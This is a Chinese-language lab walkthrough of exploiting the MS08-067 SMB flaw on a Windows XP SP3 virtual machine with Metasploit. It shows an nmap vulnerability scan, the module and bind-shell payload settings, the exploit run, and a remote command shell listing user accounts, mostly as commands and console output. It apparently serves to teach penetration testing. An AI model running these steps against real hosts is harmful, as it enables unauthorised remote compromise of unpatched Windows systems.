ms08-067漏洞 远程溢出入侵测试

被攻击者IP地址：192.168.9.4，操作系统Windows XP sp3 English

攻击者IP地址：192.168.9.1

 

//查看数据库连接状态

msf > db_status
[*] postgresql connected to msf3

//使用nmap扫描目标机器
msf > db_nmap -sS -sV -O --script=smb-check-vulns.nse -n 192.168.9.4
[*] Nmap: Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-09-25 11:01
[*] Nmap: Nmap scan report for 192.168.9.4
[*] Nmap: Host is up (0.00s latency).
[*] Nmap: Not shown: 997 closed ports
[*] Nmap: PORT    STATE SERVICE      VERSION
[*] Nmap: 135/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 139/tcp open  netbios-ssn
[*] Nmap: 445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:43:D6:5F (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows XP|2003
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
[*] Nmap: OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Host script results:
[*] Nmap: | smb-check-vulns:
[*] Nmap: |   MS08-067: VULNERABLE
[*] Nmap: |   Conficker: Likely CLEAN
[*] Nmap: |   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |   MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
[*] Nmap: |_  MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
[*] Nmap: OS and Service detection performed. Please report any incorrect results athttp://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.28 seconds

//查找ms08_067漏洞

msf > search ms08_067

Matching Modules
================

   Name                                 Disclosure Date          Rank   Description
   ----                                 ---------------          ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28 00:00:00 UTC  great  Microsoft Server Service Relative Path Stack Corruption

//使用MS08_067漏洞
msf > use exploit/windows/smb/ms08_067_netapi

//设置远程地址，正向连接
msf  exploit(ms08_067_netapi) > set RHOST 192.168.9.4
RHOST => 192.168.9.4

//设置ShellCode
msf  exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp

//显示配置的选项
msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.9.4      yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LPORT     4444             yes       The listen port
   RHOST     192.168.9.4      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

//expliot
msf  exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Command shell session 1 opened (192.168.9.1:1126 -> 192.168.9.4:4444) at 2012-09-25 11:04:31 +0800

成功返回Shell

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    hacker
HelpAssistant            SUPPORT_388945a0
The command completed with one or more errors.

------------------------------------------------------------------------------------------------------------------------

如果想漏洞支持什么操作系统，可以输入info命令，就能看到关于漏洞的详细信息。